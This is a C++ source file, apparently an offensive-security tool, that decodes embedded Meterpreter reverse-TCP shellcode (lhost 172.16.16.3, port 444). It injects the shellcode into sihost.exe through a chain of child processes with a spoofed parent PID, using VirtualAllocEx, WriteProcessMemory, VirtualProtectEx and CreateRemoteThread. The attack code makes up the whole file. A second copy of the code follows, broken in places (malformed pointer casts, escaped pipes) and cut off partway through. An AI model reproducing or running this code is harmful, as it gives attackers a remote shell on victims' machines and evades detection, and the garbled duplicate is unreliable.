uf0o/processgodfathering.cpp

## processgodfathering.cpp
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <string.h>
#include <iostream>
#include <stdarg.h>

void _dbg_printf(const char *fmt, ...)
{
	char msg[2048] = {};

	va_list args;
	va_start(args, fmt);
	_vsprintf_l(msg, fmt, NULL, args);

#ifdef _CONSOLE
	printf(msg);
	printf("\n");
#else
	OutputDebugStringA(msg);
#endif
	va_end(args);
}

#ifdef _DEBUG
#define PRINTF(fmt, ...) _dbg_printf(fmt, __VA_ARGS__)
#else
#define PRINTF(...)
#endif

// setting global vars in BSS
#pragma bss_seg("shared")
int buffer;
PVOID sharedRemoteBuffer;
HANDLE remoteProcessHandle;
HANDLE remoteProcessHandleDup;
#pragma bss_seg()
#pragma comment(linker, "/section:shared,RWS")

bool bAttachToConsole()
{
	if (!AttachConsole(ATTACH_PARENT_PROCESS))
	{
		if (GetLastError() != ERROR_ACCESS_DENIED) //already has a console
		{
			if (!AttachConsole(GetCurrentProcessId()))
			{
				DWORD dwLastError = GetLastError();
				if (dwLastError != ERROR_ACCESS_DENIED) //already has a console
				{
					return false;
				}
			}
		}
	}

	return true;
}

static void* DecodeShellcode(__out SIZE_T *size)
{
	//encoded shellcode here   / windows/meterpreter/reverse_tcp lport 444 lhost 172.16.16.3
	unsigned char shellcode[] = "\x84\x27\x56\xd9\x84\xd6\xe8\x79\x29\x87\x4e\x3e\xae\x92\x6c\xd6\xce\x43\x33\xd7\xcf\x43\xeb\x21\xd7\x89\xae\xd6\x1e\x2a\x57\xff\xd6\x8f\x47\xfe\x56\x8e\x55\xff\xd6\x00\x86\x16\xd9\x77\xa4\x59\x56\x4f\x84\x51\x81\xe6\x20\xf7\xd2\x20\xb3\x0b\x6c\x79\x29\xaf\x64\x16\xa4\xd8\x46\x70\x0f\xdd\x84\x92\xa7\xe3\x26\x75\x20\xf6\x04\x3d\xa7\xe3\x26\x7d\x20\x66\xb8\x77\xe7\x3b\x4a\x40\x20\xf6\x00\x34\xa7\xb4\x74\xec\xae\xab\xc1\x7e\x2b\x96\x44\x41\x10\x26\x66\x1e\x96\xce\xd1\x33\x01\xad\x47\x4f\xe4\x96\x1d\x31\xae\x8e\x6e\x24\x62\xa2\x63\x7a\x48\xc7\xaf\x8e\xe0\x92\x6c\x79\x58\x97\x5f\x3e\xae\x92\x65\xc9\x31\x09\xa2\x37\x8e\x88\x1d\x70\x2a\x0f\x3f\x36\xaa\x98\x45\x59\x33\xfb\x84\x37\x51\xab\xc5\x5f\x10\xaf\x3f\xb8\xbf\x9b\x4c\xa3\x20\xa1\x56\xab\x86\xaa\x55\xd8\x01\xa7\x76\x39\xb2\x3c\x52\xf0\x49\x0e\xca\x3f\x06\xb5\x56\xd7\x32\x8c\xc6\x4f\xa6\x16\x45\x59\x33\x4b\x66\x4f\x2f\x9b\xe4\x08\x21\x04\x67\x1e\xb4\xba\x1d\xf9\x38\x8e\x6e\x24\x86\x99\x44\x72\xe2\xac\x05\x16\xa5\xba\x47\x51\x62\x8e\x3e\xa3\xaa\xba\x26\x86\x35\x8c\x66\x15\xe5\x9b\x1d\x3b\x14\xee\xb1\xc1\x51\x39\x65\x5f\x52\xed\x67\xe9\x40\xbf\xa1\x74\xa7\x09\x40\x3e\x86\x58\x65\x48\x15\xae\xb6\x66\x27\x7c\xa8\x99\xd6\x3d\x24\x17\x79\xfe\x22\x56\x27\x09\x28\x78\xae\xba\xa6\x70\x18\xbb\x67\xc6\xf6\x1b\x82\xbd\xc9\x78\xf4\x54\xc4\x9b\x5d\x45\x43\xcc\xe7\x18\xb6\x3b\x4a\x40\x43\xed\x67\x69\x2e\x71\xdf\x0e\x29\x87\x4e\x3e\x51\x28\x45\x48\xb1\x9a\x8c\x3e\xae\x92\x00\x79\x6f\x87\x8b\x3e\x00\x92\xa0\x79\x2f\x87\x8b\x3e\x43\x92\x22\x79\xc5\x87\x4e\x3e\xe5\x9b\x5d\x41\x00\x7f\x56\x49\x8e\x92\x6c\xd0\x0f\xbe\x67\x69\x66\xe1\xaf\x21\x29\x87\x4e\x3e\x51\x28\x71\xe6\x29\x87\x4e\x33\xae\x1c\x6c\xf7\x29\x89\x4e\x50\xae\xd5\x6c\x9c\x29\x62\x4e\x52\xae\xd4\x6c\xbc\x29\x29\x4e\xf2\xae\x94\x6c\xbc\x29\x6a\x4e\x70\xae\x7e\x6c\x9c\x29\x6f\x4e\x56\xae\xfa\x6c\x91\x29\x81\x4e\x56\xae\xdb\x6c\x15\x29\x80\x4e\xd7\xae\x5a\x6c\x91\x29\xef\x4e\x96\xae\xfe\x6c\x10\x29\xce\x4e\x93\xae\x1c\x6c\xb5\x29\xc9\x4e\xd0\xae\xde\x6c\x70\x29\xad\x4e\x11\xae\x34\x6c\x13\x29\xe1\x4e\x14\xae\x14\x6c\x7f\x29\xaa\x4e\xd6\xae\x95\x6c\x53\x29\xcc\x4e\x96\xae\xb8\x6c\x15\x29\xa0\x4e\x11\xae\xdc\x6c\x93\x29\xac\x4e\xd7\xae\x1b\x6c\x7f\x29\x61\x4e\x72\xae\x9d\x6c\xb7\x29\xcd\x4e\xf6\xae\x37\x6c\x74\x29\xea\x4e\xd6\xae\x99\x6c\xb7\x29\x8c\x4e\x50\xae\x98\x6c\x7e\x29\x2f\x4e\x93\xae\x3a\x6c\xb4\x29\x0f\x4e\x18\xae\xd9\x6c\x76\x29\x69\x4e\xf0\xae\xfa\x6c\x92\x29\x29\x4e\x34\xae\xda\x6c\x7e\x29\xe9\x4e\x10\xae\x5a\x6c\xff\x29\x61\x4e\x38\xae\xbe\x6c\x52\x29\x6c\x4e\x30\xae\xb8\x6c\xbf\x29\xc1\x4e\xb8\xae\xb9\x6c\x91\x29\xef\x4e\x10\xae\xfc\x6c\xbf\x29\x0e\x4e\x71\xae\xbf\x6c\x72\x29\x0f\x4e\x14\xae\x92\x6c\x70\x18\xbf\x24\x75\x86\x99\xc5\x48\x91\xae\x3e\x26\x2a\x3b\x4a\x40\x43\x8e\xb6\x26\xae\xb2\x7c\x79\x23\xed\x24\x17\x56\xca\x7f\x7b\x5f\xec\xb1\x84\xa7\xa3\xb4\x70\x59\x9a\x4a\x37\x9f\x6e\x65\x48\x16\xae\xb6\x66\x8a\x66\x0d\x75\xd6\x3d\xfe\x26\x4f\x02\xc1\x79\x29\x87\x47\x4f\x46\x93\xdc\x61\xa7\xc0\x47\x0f\x95\x9b\x93\x41\x20\xbf\x72\x3a\x84\xf8\x66\x70\x3e\xe7\x4e\x3e\xae\xf2\x6c\x79\x29\x8d\x67\x0f\xb2\x9b\x1c\xe4\x2d\x8e\x7f\xc2\x87\xa3\x53\xf0\x18\xbb\xc7\x0f\xf3\xbb\x94\x21\x72\x3c\x13\x17\x51\x28\xdc\x61\xa7\x22\x33\x7c\xa7\xe3\x84\x7b\x99\x9f\xc0\x5a\xa7\xe2\x94\x78\x64\xe7\x45\x37\x9f\x72\x45\x48\x36\xca\x4d\x16\x85\x9b\x5d\x47\x64\x43\x05\x17\xf9\xe8\x67\xca\xf0\x87\x4e\x3e\xae\x6d\xd6\x34\x68\x6c\x47\x0f\x90\xdf\x8f\x32\x63\x8a\x4e\x58\xae\x92\x45\x48\x35\xca\xce\x16\x85\xbb\x3b\x03\x22\x34\x97\x3e\xae\x92\x6c\x86\x93\x2e\x68\x26\xc4\xd9\x65\x48\x17\x2e\x68\x07\xc4\xf8\x06\x13\x00\xd0\xfc\x35\xd9\xa0\x6c\x79\x29\x87\xb1\x84\x1e\x8a\xc2\xf8\x20\x78\xb7\xb0\xee\xef\x1b\x64\xf2\x87\x4e\x3e\xa7\xa3\x52\x13\x62\xae\xb6\x66\x0e\x83\xdf\x77\xd6\x3d\xfe\x26\x20\xaf\x65\x48\x17\xca\x87\x75\x87\xa3\x70\xd0\x18\x5f\x24\x73\xaf\xbb\x5d\x45\x00\x7f\x16\x31\x2e\x77\x88\x86\x93\x37\x56\xb0\xf7\xbb\x1d\xb8\x64\x84\x67\x0f\x92\xbb\x5d\x85\x00\xe2\x6a\x17\x9f\x8e\xc5\x48\xf1\xca\x2e\x75\x87\xc5\xc9\xb4\x1c\xff\x4e\x3e\xae\x92\x93\xc3\x99\x9f\xaf\xae\x5d\x6d\x93\x86\x34\x05\x4e\x3e\xae\x3c\x60\x35\xa9\xdd\x80\x45\x6f\xd5\x07\x93\x89\xaf\x51\x46\x7c\x8f\x60\x38\x65\x8c\x47\xec\x27\xa3\x92\x50\x58\x66\x30\xea\x4f\x22\xc2\x86\xd6\x78\x47\xec\xc4\xb9\x21\x71\x62\xae\x7f\x04\x96\xce\x6e\x50\xd1\x9f\x4e\x3c\xae\x92\x45\x2e\x22\x13\x24\x82\xae\x92\x6c\x79\xd6\x3d\x47\x4c\xc4\xf8\x65\x48\xd5\x8e\x7f\x00\xa7\xa3\x37\x50\xd1\x9f\x4e\x3a\xae\x92\x45\x48\x16\xae\xb6\x66\x23\xb7\xe8\xb6\xd6\x3d\x47\x4e\x36\x96\xdc\x61\xc8\x17\x6b\xc1\x51\x6d\xa0\x08\xc9\x8e\x6e\x46\x1e\x8a\xc2\x43\x22\xff\x45\x73\xae\xb9\x1b\x65\x8a\xc2\x0f\x16\x9f\xc9\x93\xc3\x41\x55\xa7\x76\x62\xe4\x25";
		void *r = malloc(sizeof(shellcode));
	char *ptr = (char *) r;

	for(int i = 0; i < sizeof(shellcode); i++) {
		ptr[i] = ~((shellcode[i] << 3) | (shellcode[i] >> (8 - 3))); //ror
	}

	//printf("Length: %d\n", sizeof(shellcode));
	//for (int i = 0; i < sizeof shellcode-1; i++) {
	//	printf("\\x%02x", shellcode[i]);
	//}

	*size = sizeof(shellcode);
	return r;
}

bool CreateProcessWithParent(DWORD parentId, PWCHAR arg) {
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, parentId);

	if (!hProcess)
		return false;

	SIZE_T size;

	::InitializeProcThreadAttributeList(nullptr, 1, 0, &size);

	auto buffer = std::make_unique<BYTE[]>(size);
	auto attributes = reinterpret_cast<PPROC_THREAD_ATTRIBUTE_LIST>(buffer.get());
	::InitializeProcThreadAttributeList(attributes, 1, 0, &size);

	::UpdateProcThreadAttribute(attributes, 0,
		PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
		&hProcess, sizeof(hProcess), nullptr, nullptr);

	STARTUPINFOEX si = { sizeof(si) };
	si.lpAttributeList = attributes;
	PROCESS_INFORMATION pi;

	PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
	::SetHandleInformation(remoteProcessHandle, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT);

	WCHAR AppName[] = L".\\RemoteThreadInject.exe";
	WCHAR cmdline[100];
	WCHAR base[] = L".\\RemoteThreadInject.exe %ws";
	swprintf_s(cmdline, base, arg);

	BOOL created = ::CreateProcess(AppName, cmdline, 0, 0, TRUE, EXTENDED_STARTUPINFO_PRESENT | CREATE_SUSPENDED, 0, 0, (STARTUPINFO*)&si, &pi);
	HANDLE localProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pi.dwProcessId);

	DuplicateHandle(GetCurrentProcess(),remoteProcessHandle,localProc,&remoteProcessHandleDup,0,TRUE,DUPLICATE_SAME_ACCESS);
	DuplicateHandle(localProc, remoteProcessHandleDup, localProc, &remoteProcessHandle, 0, TRUE, DUPLICATE_SAME_ACCESS);

	ResumeThread(pi.hThread);
	PRINTF("%ws - %ws", AppName, cmdline);

	::CloseHandle(hProcess);
	::DeleteProcThreadAttributeList(attributes);

	return created;
}
DWORD FindProcByName(LPCWSTR lpProcessName)
{
	HANDLE hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hSnapshot == INVALID_HANDLE_VALUE) {
		PRINTF("Failed to create snapshot. LastError %d", GetLastError());
		return 0;
	}

	PROCESSENTRY32 pe;
	pe.dwSize = sizeof(pe);

	if (!::Process32First(hSnapshot, &pe)) {
		PRINTF("Failed to create snapshot. LastError %d", GetLastError());
		return 0;
	}

	DWORD dwPid = 0;

	do {
		if (_wcsicmp(lpProcessName, pe.szExeFile) == 0) {
			dwPid = pe.th32ProcessID;
			PRINTF("[*] Target PID = %d", dwPid);
		}
	} while(::Process32Next(hSnapshot, &pe) && dwPid == 0);

	CloseHandle(hSnapshot);
	return dwPid;
}

const char *args[] = {
	"",
	"VA",
	"WPA",
	"VP",
	"CRT"
};

int parseArgs1(const wchar_t *arg)
{
	if (arg == NULL)
		return 0;

	if (wcscmp(arg, L"VA") == 0)
		return 1;

	if (wcscmp(arg, L"WPM") == 0)
		return 2;

	if (wcscmp(arg, L"VP") == 0)
		return 3;

	if (wcscmp(arg, L"CRT") == 0)
		return 4;

	return 0;
}

int wmain(int argc, wchar_t *argv[])
{
	PRINTF("[*] ...Running Main\n");
	STARTUPINFOA si;
	si = {};
	PROCESS_INFORMATION child = {};
	int targetPid;
	DWORD fakePPIDPid = 0;
	DWORD returnLength = 0;
	WCHAR fakePPID[] = L"sihost.exe";
	WCHAR target[] = L"sihost.exe";
	BOOL result = TRUE;

	int c = 0;
	if (argc > 1)
		c = parseArgs1(argv[1]);

	SIZE_T size = 0;
	void* shellcode = DecodeShellcode(&size);

	SIZE_T mem_size = ((size % 4096) == 0) ? size : (size / 4096) + 4096;
		DWORD old = 0;

	char targetImage[MAX_PATH] = {};

	const char* base = ".\\RemoteThreadInject.exe %s";
	const char* prefix = "null";

	fakePPIDPid = FindProcByName(fakePPID);

	HANDLE remoteThread = NULL;

	switch(c) {
		case 0:{
			PRINTF("[*] Step 0 - Process PID is: %d\n", GetCurrentProcessId());
			targetPid = FindProcByName(target);
			PRINTF("%d target image\n", targetPid);
			remoteProcessHandle = OpenProcess(PROCESS_ALL_ACCESS, TRUE, targetPid);
			PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
			if (remoteProcessHandle == NULL) {
				PRINTF("Cannot open processs. LastError %d\n", GetLastError());
				return 1;
			}
			WCHAR prefix_new[] = L"VA";
			PRINTF("%s target image\n", targetImage);
			CreateProcessWithParent(fakePPIDPid, prefix_new);
			ExitProcess(0);
			break;
		}
		case 1: {
			PRINTF("[*] Step 1 - Current PID is: %d\n", GetCurrentProcessId());
			PRINTF("\t[*] Executing  Virtual Alloc");
			PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
			sharedRemoteBuffer = VirtualAllocEx(remoteProcessHandle, NULL, mem_size, (MEM_RESERVE | MEM_COMMIT), PAGE_READWRITE);
			PRINTF("\t[*] shared buffer at: 0x%x\n", sharedRemoteBuffer);

			if (sharedRemoteBuffer == NULL) {
				PRINTF("Cannot allocate memory on remote process. LastError %d", GetLastError());
				return 1;
			}
			WCHAR prefix_new[] = L"WPM";
			CreateProcessWithParent(fakePPIDPid, prefix_new);
			ExitProcess(0);
			break; }
		case 2: {
			PRINTF("[*] Step 2 - Current PID is: %d", GetCurrentProcessId());
			PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
			PRINTF("\t[*] Executing  Write Process Memory");
			if (WriteProcessMemory(remoteProcessHandle, sharedRemoteBuffer, shellcode, size, NULL) == FALSE) {
				PRINTF("Error using WriteProcessMemory. LastError %d", GetLastError());
				return 1;
			}

			memset(shellcode, 0, size);
			free(shellcode);
			WCHAR prefix_new[] = L"VP";
			CreateProcessWithParent(fakePPIDPid, prefix_new);
			ExitProcess(0);
			break; }
		case 3: {
			PRINTF("[*] Step 3 - Current PID is: %d", GetCurrentProcessId());
			PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
			PRINTF("\t[*] Executing Virtual Protect");
			if (VirtualProtectEx(remoteProcessHandle, sharedRemoteBuffer, mem_size, PAGE_EXECUTE_READWRITE, &old) == FALSE) {
				PRINTF("Error on VirtualProtectEx. LastError %d", GetLastError());
				return 1;
			}

			WCHAR prefix_new[] = L"CRT";
			CreateProcessWithParent(fakePPIDPid, prefix_new);
			ExitProcess(0); }
		case 4: {
			PRINTF("[*] Step 4 - Current PID is: %d", GetCurrentProcessId());
			PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandleDup);
			PRINTF("\t[*] Executing  Create Remote Thread");
			remoteThread = CreateRemoteThread(remoteProcessHandleDup, NULL, 0, (LPTHREAD_START_ROUTINE)sharedRemoteBuffer, NULL, 0, NULL);
			if (remoteThread == NULL) {
				PRINTF("Cannot Create Thread on remote process. LastError %d", GetLastError());
				return 1;
			}
			WaitForSingleObject(remoteThread, INFINITE);
			PRINTF("[*] - Exiting");
			ExitProcess(0);
			break; }
	}

	ResumeThread(child.hThread);
	WaitForSingleObject(child.hProcess, INFINITE);
	CloseHandle(child.hThread);
	CloseHandle(child.hProcess);
	remoteProcessHandle = NULL;
	if (remoteProcessHandle != NULL) {
		CloseHandle(remoteProcessHandle);
	}
	return 0;
}

int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd)
{
	LPWSTR* szArglist;
	int nArgs;
	int i;

	PRINTF("[*] ...Running WinMain\n");
	szArglist = CommandLineToArgvW(GetCommandLineW(), &nArgs);
	if (NULL == szArglist)
	{
		PRINTF("CommandLineToArgvW failed\n");
		return 0;
	}
	else for (i = 0; i < nArgs; i++) PRINTF("%d: %ws", i, szArglist[i]);

	wmain(nArgs, szArglist);
}
	#include <windows.h>
	#include <tlhelp32.h>
	#include <stdio.h>
	#include <string.h>
	#include <iostream>
	#include <stdarg.h>

	void _dbg_printf(const char *fmt, ...)
	{
	char msg[2048] = {};

	va_list args;
	va_start(args, fmt);
	_vsprintf_l(msg, fmt, NULL, args);

	#ifdef _CONSOLE
	printf(msg);
	printf("\n");
	#else
	OutputDebugStringA(msg);
	#endif
	va_end(args);
	}

	#ifdef _DEBUG
	#define PRINTF(fmt, ...) _dbg_printf(fmt, __VA_ARGS__)
	#else
	#define PRINTF(...)
	#endif

	// setting global vars in BSS
	#pragma bss_seg("shared")
	int buffer;
	PVOID sharedRemoteBuffer;
	HANDLE remoteProcessHandle;
	HANDLE remoteProcessHandleDup;
	#pragma bss_seg()
	#pragma comment(linker, "/section:shared,RWS")

	bool bAttachToConsole()
	{
	if (!AttachConsole(ATTACH_PARENT_PROCESS))
	{
	if (GetLastError() != ERROR_ACCESS_DENIED) //already has a console
	{
	if (!AttachConsole(GetCurrentProcessId()))
	{
	DWORD dwLastError = GetLastError();
	if (dwLastError != ERROR_ACCESS_DENIED) //already has a console
	{
	return false;
	}
	}
	}
	}

	return true;
	}

	static void* DecodeShellcode(__out SIZE_T *size)
	{
	//encoded shellcode here / windows/meterpreter/reverse_tcp lport 444 lhost 172.16.16.3
	unsigned char shellcode[] = "\x84\x27\x56\xd9\x84\xd6\xe8\x79\x29\x87\x4e\x3e\xae\x92\x6c\xd6\xce\x43\x33\xd7\xcf\x43\xeb\x21\xd7\x89\xae\xd6\x1e\x2a\x57\xff\xd6\x8f\x47\xfe\x56\x8e\x55\xff\xd6\x00\x86\x16\xd9\x77\xa4\x59\x56\x4f\x84\x51\x81\xe6\x20\xf7\xd2\x20\xb3\x0b\x6c\x79\x29\xaf\x64\x16\xa4\xd8\x46\x70\x0f\xdd\x84\x92\xa7\xe3\x26\x75\x20\xf6\x04\x3d\xa7\xe3\x26\x7d\x20\x66\xb8\x77\xe7\x3b\x4a\x40\x20\xf6\x00\x34\xa7\xb4\x74\xec\xae\xab\xc1\x7e\x2b\x96\x44\x41\x10\x26\x66\x1e\x96\xce\xd1\x33\x01\xad\x47\x4f\xe4\x96\x1d\x31\xae\x8e\x6e\x24\x62\xa2\x63\x7a\x48\xc7\xaf\x8e\xe0\x92\x6c\x79\x58\x97\x5f\x3e\xae\x92\x65\xc9\x31\x09\xa2\x37\x8e\x88\x1d\x70\x2a\x0f\x3f\x36\xaa\x98\x45\x59\x33\xfb\x84\x37\x51\xab\xc5\x5f\x10\xaf\x3f\xb8\xbf\x9b\x4c\xa3\x20\xa1\x56\xab\x86\xaa\x55\xd8\x01\xa7\x76\x39\xb2\x3c\x52\xf0\x49\x0e\xca\x3f\x06\xb5\x56\xd7\x32\x8c\xc6\x4f\xa6\x16\x45\x59\x33\x4b\x66\x4f\x2f\x9b\xe4\x08\x21\x04\x67\x1e\xb4\xba\x1d\xf9\x38\x8e\x6e\x24\x86\x99\x44\x72\xe2\xac\x05\x16\xa5\xba\x47\x51\x62\x8e\x3e\xa3\xaa\xba\x26\x86\x35\x8c\x66\x15\xe5\x9b\x1d\x3b\x14\xee\xb1\xc1\x51\x39\x65\x5f\x52\xed\x67\xe9\x40\xbf\xa1\x74\xa7\x09\x40\x3e\x86\x58\x65\x48\x15\xae\xb6\x66\x27\x7c\xa8\x99\xd6\x3d\x24\x17\x79\xfe\x22\x56\x27\x09\x28\x78\xae\xba\xa6\x70\x18\xbb\x67\xc6\xf6\x1b\x82\xbd\xc9\x78\xf4\x54\xc4\x9b\x5d\x45\x43\xcc\xe7\x18\xb6\x3b\x4a\x40\x43\xed\x67\x69\x2e\x71\xdf\x0e\x29\x87\x4e\x3e\x51\x28\x45\x48\xb1\x9a\x8c\x3e\xae\x92\x00\x79\x6f\x87\x8b\x3e\x00\x92\xa0\x79\x2f\x87\x8b\x3e\x43\x92\x22\x79\xc5\x87\x4e\x3e\xe5\x9b\x5d\x41\x00\x7f\x56\x49\x8e\x92\x6c\xd0\x0f\xbe\x67\x69\x66\xe1\xaf\x21\x29\x87\x4e\x3e\x51\x28\x71\xe6\x29\x87\x4e\x33\xae\x1c\x6c\xf7\x29\x89\x4e\x50\xae\xd5\x6c\x9c\x29\x62\x4e\x52\xae\xd4\x6c\xbc\x29\x29\x4e\xf2\xae\x94\x6c\xbc\x29\x6a\x4e\x70\xae\x7e\x6c\x9c\x29\x6f\x4e\x56\xae\xfa\x6c\x91\x29\x81\x4e\x56\xae\xdb\x6c\x15\x29\x80\x4e\xd7\xae\x5a\x6c\x91\x29\xef\x4e\x96\xae\xfe\x6c\x10\x29\xce\x4e\x93\xae\x1c\x6c\xb5\x29\xc9\x4e\xd0\xae\xde\x6c\x70\x29\xad\x4e\x11\xae\x34\x6c\x13\x29\xe1\x4e\x14\xae\x14\x6c\x7f\x29\xaa\x4e\xd6\xae\x95\x6c\x53\x29\xcc\x4e\x96\xae\xb8\x6c\x15\x29\xa0\x4e\x11\xae\xdc\x6c\x93\x29\xac\x4e\xd7\xae\x1b\x6c\x7f\x29\x61\x4e\x72\xae\x9d\x6c\xb7\x29\xcd\x4e\xf6\xae\x37\x6c\x74\x29\xea\x4e\xd6\xae\x99\x6c\xb7\x29\x8c\x4e\x50\xae\x98\x6c\x7e\x29\x2f\x4e\x93\xae\x3a\x6c\xb4\x29\x0f\x4e\x18\xae\xd9\x6c\x76\x29\x69\x4e\xf0\xae\xfa\x6c\x92\x29\x29\x4e\x34\xae\xda\x6c\x7e\x29\xe9\x4e\x10\xae\x5a\x6c\xff\x29\x61\x4e\x38\xae\xbe\x6c\x52\x29\x6c\x4e\x30\xae\xb8\x6c\xbf\x29\xc1\x4e\xb8\xae\xb9\x6c\x91\x29\xef\x4e\x10\xae\xfc\x6c\xbf\x29\x0e\x4e\x71\xae\xbf\x6c\x72\x29\x0f\x4e\x14\xae\x92\x6c\x70\x18\xbf\x24\x75\x86\x99\xc5\x48\x91\xae\x3e\x26\x2a\x3b\x4a\x40\x43\x8e\xb6\x26\xae\xb2\x7c\x79\x23\xed\x24\x17\x56\xca\x7f\x7b\x5f\xec\xb1\x84\xa7\xa3\xb4\x70\x59\x9a\x4a\x37\x9f\x6e\x65\x48\x16\xae\xb6\x66\x8a\x66\x0d\x75\xd6\x3d\xfe\x26\x4f\x02\xc1\x79\x29\x87\x47\x4f\x46\x93\xdc\x61\xa7\xc0\x47\x0f\x95\x9b\x93\x41\x20\xbf\x72\x3a\x84\xf8\x66\x70\x3e\xe7\x4e\x3e\xae\xf2\x6c\x79\x29\x8d\x67\x0f\xb2\x9b\x1c\xe4\x2d\x8e\x7f\xc2\x87\xa3\x53\xf0\x18\xbb\xc7\x0f\xf3\xbb\x94\x21\x72\x3c\x13\x17\x51\x28\xdc\x61\xa7\x22\x33\x7c\xa7\xe3\x84\x7b\x99\x9f\xc0\x5a\xa7\xe2\x94\x78\x64\xe7\x45\x37\x9f\x72\x45\x48\x36\xca\x4d\x16\x85\x9b\x5d\x47\x64\x43\x05\x17\xf9\xe8\x67\xca\xf0\x87\x4e\x3e\xae\x6d\xd6\x34\x68\x6c\x47\x0f\x90\xdf\x8f\x32\x63\x8a\x4e\x58\xae\x92\x45\x48\x35\xca\xce\x16\x85\xbb\x3b\x03\x22\x34\x97\x3e\xae\x92\x6c\x86\x93\x2e\x68\x26\xc4\xd9\x65\x48\x17\x2e\x68\x07\xc4\xf8\x06\x13\x00\xd0\xfc\x35\xd9\xa0\x6c\x79\x29\x87\xb1\x84\x1e\x8a\xc2\xf8\x20\x78\xb7\xb0\xee\xef\x1b\x64\xf2\x87\x4e\x3e\xa7\xa3\x52\x13\x62\xae\xb6\x66\x0e\x83\xdf\x77\xd6\x3d\xfe\x26\x20\xaf\x65\x48\x17\xca\x87\x75\x87\xa3\x70\xd0\x18\x5f\x24\x73\xaf\xbb\x5d\x45\x00\x7f\x16\x31\x2e\x77\x88\x86\x93\x37\x56\xb0\xf7\xbb\x1d\xb8\x64\x84\x67\x0f\x92\xbb\x5d\x85\x00\xe2\x6a\x17\x9f\x8e\xc5\x48\xf1\xca\x2e\x75\x87\xc5\xc9\xb4\x1c\xff\x4e\x3e\xae\x92\x93\xc3\x99\x9f\xaf\xae\x5d\x6d\x93\x86\x34\x05\x4e\x3e\xae\x3c\x60\x35\xa9\xdd\x80\x45\x6f\xd5\x07\x93\x89\xaf\x51\x46\x7c\x8f\x60\x38\x65\x8c\x47\xec\x27\xa3\x92\x50\x58\x66\x30\xea\x4f\x22\xc2\x86\xd6\x78\x47\xec\xc4\xb9\x21\x71\x62\xae\x7f\x04\x96\xce\x6e\x50\xd1\x9f\x4e\x3c\xae\x92\x45\x2e\x22\x13\x24\x82\xae\x92\x6c\x79\xd6\x3d\x47\x4c\xc4\xf8\x65\x48\xd5\x8e\x7f\x00\xa7\xa3\x37\x50\xd1\x9f\x4e\x3a\xae\x92\x45\x48\x16\xae\xb6\x66\x23\xb7\xe8\xb6\xd6\x3d\x47\x4e\x36\x96\xdc\x61\xc8\x17\x6b\xc1\x51\x6d\xa0\x08\xc9\x8e\x6e\x46\x1e\x8a\xc2\x43\x22\xff\x45\x73\xae\xb9\x1b\x65\x8a\xc2\x0f\x16\x9f\xc9\x93\xc3\x41\x55\xa7\x76\x62\xe4\x25";
	void *r = malloc(sizeof(shellcode));
	char ptr = (char ) r;

	for(int i = 0; i < sizeof(shellcode); i++) {
	ptr[i] = ~((shellcode[i] << 3) \| (shellcode[i] >> (8 - 3))); //ror
	}

	//printf("Length: %d\n", sizeof(shellcode));
	//for (int i = 0; i < sizeof shellcode-1; i++) {
	// printf("\\x%02x", shellcode[i]);
	//}

	*size = sizeof(shellcode);
	return r;
	}

	bool CreateProcessWithParent(DWORD parentId, PWCHAR arg) {
	HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, TRUE, parentId);

	if (!hProcess)
	return false;

	SIZE_T size;

	::InitializeProcThreadAttributeList(nullptr, 1, 0, &size);

	auto buffer = std::make_unique<BYTE[]>(size);
	auto attributes = reinterpret_cast<PPROC_THREAD_ATTRIBUTE_LIST>(buffer.get());
	::InitializeProcThreadAttributeList(attributes, 1, 0, &size);

	::UpdateProcThreadAttribute(attributes, 0,
	PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
	&hProcess, sizeof(hProcess), nullptr, nullptr);

	STARTUPINFOEX si = { sizeof(si) };
	si.lpAttributeList = attributes;
	PROCESS_INFORMATION pi;

	PRINTF("[*] Process Handle : 0x%x\n", remoteProcessHandle);
	::SetHandleInformation(remoteProcessHandle, HANDLE_FLAG_INHERIT, HANDLE_FLAG_INHERIT);

	WCHAR AppName[] = L".\\RemoteThreadInject.exe";
	WCHAR cmdline[100];
	WCHAR base[] = L".\\RemoteThreadInject.exe %ws";
	swprintf_s(cmdline, base, arg);

	BOOL created = ::CreateProcess(AppName, cmdline, 0, 0, TRUE, EXTENDED_STARTUPINFO_PRESENT \| CREATE_SUSPENDED, 0, 0, (STARTUPINFO*)&si, &pi);
	HANDLE localProc = OpenProcess(PROCESS_ALL_ACCESS, TRUE, pi.dwProcessId);

	DuplicateHandle(GetCurrentProcess(),remoteProcessHandle,localProc,&remoteProcessHandleDup,0,TRUE,DUPLICATE_SAME_ACCESS);
	DuplicateHandle(localProc, remoteProcessHandleDup, localProc, &remoteProcessHandle, 0, TRUE, DUPLICATE_SAME_ACCESS);

	ResumeThread(pi.hThread);
	PRINTF("%ws - %ws", AppName, cmdline);

	::CloseHandle(hProcess);
	::DeleteProcThreadAttributeList(attributes);

	return created;
	}
	DWORD FindProcByName(LPCWSTR lpProcessName)
	{
	HANDLE hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hSnapshot == INVALID_HANDLE_VALUE) {
	PRINTF("Failed to create snapshot. LastError %d", GetLastError());
	return 0;
	}

	PROCESSENTRY32 pe;
	pe.dwSize = sizeof(pe);

	if (!::Process32First(hSnapshot, &pe)) {
	PRINTF("Failed to create snapshot. LastError %d", GetLastError());
	return 0;
	}

	DWORD dwPid = 0;

	do {
	if (_wcsicmp(lpProcessName, pe.szExeFile) == 0) {
	dwPid = pe.th32ProcessID;
	PRINTF("[*] Target PID = %d", dwPid);
	}
	} while(::Process32Next(hSnapshot, &pe) && dwPid == 0);

	CloseHandle(hSnapshot);
	return dwPid;
	}

	const char *args[] = {
	"",
	"VA",
